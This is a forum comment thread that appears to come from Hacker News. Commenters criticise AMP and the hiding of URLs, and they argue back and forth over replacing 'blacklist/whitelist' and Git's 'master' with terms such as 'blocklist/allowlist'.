Thanks, at least someone got me! I was trying to call out randomly blaming people who, if anything, would be on their side, but it seems like most people misunderstood me.


I never said it was? I said if anything the SJWs they are blaming would be on their side, so it's a weird dig to make.


Sure (I'm not sure that Venn diagram is a perfect overlap, but whatever), but AMP is bad for reasons other than accessibility.


AMP is just _bad_, IMO. Content is regularly broken until you visit the actual site, sites don't follow my dark mode preference, and interactive elements sometimes don't translate well.

It feels like someone printed a website to a PDF and decided that was good enough to serve!


Insightful, but I am confused by the final paragraph:

> I'm tired of this anti-Web and anti-accessibility SJW nonsense

“SJW” must have a meaning I’m not familiar with, because Social Justice Warriors would be pro-accessibility, not anti.


Perhaps they meant something like vigilantism or a crusade, and feel it's synonymous with SJW.



That’s not an example of idiocy.

Idiocy would be an anecdote my father told me in the mid-90s about his workplace trying to implement the same spirit with a naïve global search-and-replace, leading very quickly to a company-wide invitation to an “African-American tie dinner”.

But even that isn’t anti-accessibility.


I believe the preferred term these days is "tie dinner of color"


It's a decision I tend to respect (I would actually never have thought of it myself). Unlike the decision mentioned in the OP, I don't think it patronizes users. Awareness of language is not all bad, as language influences us subconsciously. We seemingly did not need the term much in the 80s with the ending of the Cold War, so IMHO it is not a huge loss: https://books.google.com/ngrams/graph?content=whitelist&year...

Without mentioning other connotations: IMHO the rise of computers has in places supported a discriminating (i.e. 0 vs 1) culture, because that is simply what computers do best. Whether just renaming terms changes this can indeed be doubted.

I am actually not so happy about the consequences of hiding URLs from people. This will also change how we perceive the Internet, and IMHO not for the good. And here the motivations are not clearly communicated. It might hide some of the beautiful heterogeneity and complexity of the Internet from the average user, with unforeseeable consequences.


I'm not against the effort, simply because "block-list" and "allow-list" are more descriptive and self-evident in their meaning. Insinuating that "black-list" and "white-list" are somehow racially charged terms is the idiotic part.


Changing from blacklist and whitelist to blocklist and allowlist is one of the many small things we can do that makes our black colleagues feel seen, heard, and welcome in our workplaces. I support it. No one thinks changing language is enough to eliminate the systemic racism oppressing black people in the US. Eliminating that will require work and personal change. If you can't even stop using black to mean negative in the workplace and substitute it with more accurate words - the new words are clearer - then you likely are not prepared for the real work ahead. I personally refuse to work for any company that is not committing to that work.


Why would anyone be offended by blacklist? Would they also be offended by the color black? Or maybe by dark mode, which is getting popular?

Or maybe offended by the fact that most pages on the web have a light/white theme?

This is getting ridiculous (together with github ditching the name "master" - https://twitter.com/natfriedman/status/1271253144442253312), maybe it is the result of too much working from home recently - people create problems where there are none.

What is even funnier is that those changes are proposed by white guys without any complaints from black folks.


There is a qualitative difference between your examples and “blacklist”. Dark mode is about color. The color black is a color. Light mode is a color’s brightness. A widely used white background is a color. I don’t think any reasonable person objects to using terms about color to refer to colors. Black objects are black, red objects are red, etc.

But “blacklist” is entirely different. “Blacklist” uses a color term to describe the acceptability of something. It relates a value judgment to a color. I don’t know the history of the term, but I can easily see how it could be at least somewhat offensive.

None of this is to say that the term “blacklist” is problematic or should be discouraged, but your argument about it doesn’t hold water.


But it would never cross my mind that "blacklist" is in any way related to people with dark skin color.

I don't know how others feel about it, but to me, making that connection is itself quite racist.

What would you say about Black Friday?

Or white Christmas?


Black is also not a color, but the absence of light being reflected, emitted, or let through. Hence "blacklist" doesn't need to carry judgment or a historically loaded meaning.


I don’t see your point. Blue is not a color. It’s just a failure of red or green light to be let through.


I think there is an insidiousness to our language that can help to stabilise social discrimination, and most of us (white/black, male/female) are unaware of it.

Dark mode doesn't have negative connotations. A 'blacklist' is negative selection, as opposed to a 'whitelist', which is positive selection. I didn't even realise this until I came across the idea, and, on reflection, I agree that this is a simple change in the right direction.


> Why would anyone be offended by blacklist?

Because of its etymology and history [1] for starters:

    n.

    also black-list, black list, “list of persons who have incurred suspicion,” 1610s, from black (adj.), here indicative of disgrace, censure, punishment (attested from 1590s, in black book) + list (n.). Specifically of employers’ list of workers considered troublesome (usually for union activity) is from 1888. As a verb, from 1718. Related: Blacklisted; blacklisting.

"It is notable that the first recorded use of the term occurs at the time of mass enslavement and forced deportation of Africans to work in European-held colonies in the Americas."

> Or maybe dark mode

Dark mode is not used in a negative way like "blacklist" or "blackballed". And it accurately describes exactly what happens. Unlike "blacklist" which is an inaccurate idiom that relies on "black" being used to mean "bad". So no, I doubt "dark mode" would offend anyone.

> Why would anyone be offended

You could start by learning about microaggressions [2]. This one covers "blacklist" specifically. And it was presented by a black man, if that helps with credibility.

> This is getting ridiculous

I agree that systemic racism has gone on for far too long. Even conservative four star US generals are starting to say we need big changes in society.

> What is even more funny is the fact that those changes are proposed by white guys without any complains from the black folks.

You are wrong. Just as one small counter-example, the presentation I already cited that discusses "blacklist" was made by a black man. Anecdotally, my black friends have sent me many resources recently about how to become a better anti-racist. Our diversity initiative at my current client is being led by a black employee. This is coming from oppressed black people, who have been very visibly protesting the most recent injustice for over two weeks now. And for decades, actually, for anyone who has been listening.

[1] https://www.ncbi.nlm.nih.gov/pmc/articles/PMC6148600/

[2] https://www.appic.org/Portals/0/2018%20Conference/APPIC%2020...


It's worth noting that "blacklist" is awful because its origins are in British history, having to do with political assassination and conspiracy, amongst a bunch of very Caucasian parties.

The "black" is not racial but metaphorical, as in "the absence if light". The connection to dark-skinned folks is accidental through the science of optics. Light being good and darkness being bad is part of most (all?) monotheistic culture. To excise them all would include considering much art, culture, and even holy texts insensitive. It's overkill, especially when there are more pressing reforms to pursue.

There's a nice confluence where basically all parties win by eliminating "blacklist" from benign contexts, but the original violence is not racial at all. Religious and political, sure.

In case I am not clear: if we want to be on the side of education, accurate history, and truth, we should not assume racist history and intention everywhere. In this case, it's an entirely different form of tyranny, violence, and bigotry, but we should be careful about appearing overzealous and under-informed.


> It's worth noting that "blacklist" is awful because it's origins are in British history,

> The connection to dark-skinned folks is accidental through the science of optics.

Both of these are an oversimplification that leaves out other context and other history.

The first recorded use of the term "blacklist" occurs at the time of mass enslavement and forced deportation of Africans to work in European-held colonies in the Americas.

> To excise them all would include considering much art, culture, and even holy texts insensitive.

That is a strawman. No one is suggesting to eliminate all historical uses of darkness meaning bad. What we are talking about is very specific: words that are very commonly used in a modern work setting, and that have clearer alternatives.

> The connection to dark-skinned folks is accidental.

It is far too convenient that "black" continued to mean evil in the midst of widespread dehumanization and slavery for it to be purely accidental.

Consider also that the Latin word "niger" had many of the same figurative senses ("gloomy; unlucky; bad, wicked, malicious"). Another accident?

But even if it were accidental - and I think that would be near impossible to prove - many microaggressions are accidental.

> we should not assume racist history and intention everywhere

That's another strawman. Where was that assumption made? Besides the fact that much of modern Western history is racist.

Racism against black people in the US has survived for well over 200 years, thanks in large part to a lack of intention. Clearly, it's not enough to have an absence of bad intentions. We tried that, and it is not working.


I would appreciate citations for your claims about the racial origins of the term. Wikipedia does not mention any such thing in either the article on blacklisting or the disambiguation page for the word blacklist.

There is also this Quora answer from an apparent Yale linguist specifically saying blacklist does not have racial origins, mentioning other phrases like "black sheep" that are racial only in inference, not in implication.

https://www.quora.com/Is-the-term-blacklist-racist

I also disagree that microaggressions can be accidental, though I do think reflexive actions can betray racial attitudes. But that typically lies in instinctive actions like purse-clutching, not in the formation of artistic or other creative devices like Stevenson's black spot, Tolkien's Black Gate, or the various incarnations of "black swan".

To reiterate, I am actually fine with getting rid of the term blacklist given its very negative history, but it's a stretch, and counterproductive, to racialize the term. That sort of overreach plays into the hands of people like Trump, who are not afraid of portraying these movements as unhinged.


“In the black” is a positive business term signifying profitability, as opposed to “in the red.” Is this just words, or words to hurt Native Americans? Side note, if we all change from blacklist to blocklist and such, I don’t mind and it likely is a better term. I just want to point out that black != bad.


There are lots of real problems out there, but this is an imaginary one.


Already addressed in my original comment:

If you can't even stop using black to mean negative in the workplace and substitute it with more accurate words - the new words are clearer - then you likely are not prepared for the real work ahead.

I'll also add that the problem is not imaginary. Microaggressions are a well-documented and well-studied category of racism. You can find many studies with supporting evidence. While you might choose to critique the scientific rigour of existing studies, you would have to do that with your own counter-evidence, not with a dismissive "it's imaginary". You could start here: https://journals.sagepub.com/doi/abs/10.1177/174569161982749...


The white:black :: good:evil dichotomy has been open to criticism since one group of people labeled themselves white and another group of people black. That was when the colors became politicized.


That dichotomy is older than politics, and has more to do with day being safer than night for diurnal animals like humans.


You’ll have to think and decide for yourself whether this is idiocy. I, for one, do not. The master/slave thing is stupid. The master branch in git is idiotic. Whitelist and blacklist, I can do without.